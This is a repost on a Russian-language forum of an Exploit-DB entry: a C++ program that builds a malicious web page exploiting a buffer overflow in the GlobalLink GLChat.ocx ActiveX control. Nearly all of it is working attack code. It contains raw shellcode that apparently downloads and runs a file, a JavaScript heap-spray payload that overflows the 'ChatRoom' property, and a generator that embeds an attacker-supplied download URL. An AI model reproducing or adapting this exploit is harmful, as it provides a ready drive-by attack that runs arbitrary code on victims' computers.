Exploit GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Remote Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31046
Проверка EDB
  1. Пройдено
Автор
KNELL
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2008-01-09
C++:
source: https://www.securityfocus.com/bid/27393/info

GlobalLink 'GLChat.ocx' ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

GlobalLink 'GLChat.ocx' ActiveX control 2.5.1.33 is reported affected by this issue; other versions may also be vulnerable. 

//date:2007.10 fuzz by Knell@Knell-0xSec QQ:415964  
#define _CRT_SECURE_NO_DEPRECATE

#include <windows.h>
#include <stdio.h>

const unsigned char shellcode[174] = 
{
0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A, 
0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F, 
0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1, 
0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C, 
0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41, 
0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03, 
0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B, 
0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC, 
0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB, 
0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00, 
0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};

const char* script1 = \
"<html><body><object id=\"sb\" classid=\"clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69\"></object><script>"
"var shellcode = unescape(\"";
const char* script2 = \
"\");"
"bigblock = unescape(\"%u9090\");"
"headersize = 20;"
"slackspace = headersize + shellcode.length;"
"while ( bigblock.length < slackspace ) bigblock += bigblock;"
"fillblock = bigblock.substring(0, slackspace);"
"block = bigblock.substring(0, bigblock.length - slackspace);"
"while(block.length + slackspace < 0x40000) block = block + block + fillblock;"
"memory = new Array();"
"for (x=0; x< 300; x++) memory[x] = block + shellcode;"
"var zhen = '\\x0a';"
"while (zhen.length < 4057) zhen += '\\x0a\\x0a\\x0a\\x0a';"
"sb.ChatRoom = zhen;"
"</script>"
"</body>"
"</html>";

int main(int argc, char* argv[])
{
if ( argc != 2 )
{
printf("usage:knell.exe down&exec-url\njÖʽçlobalLink)GLChat.ocx ActiveX Control BoF exploit\n bug fuzz by knell 2007.10\n");
return -1;
}

FILE *file = fopen("knell.html", "w+");
if ( file == NULL )
{
printf("create 'knell.html' failed!\n");
return -2;
}

fprintf(file, "%s", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);

const unsigned l = strlen(argv[1]);
for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);

fprintf(file, "%s", script2);
fclose(file);

printf("make 'knell.html' successed!\n");

return 0;
}
 
Источник
www.exploit-db.com

Похожие темы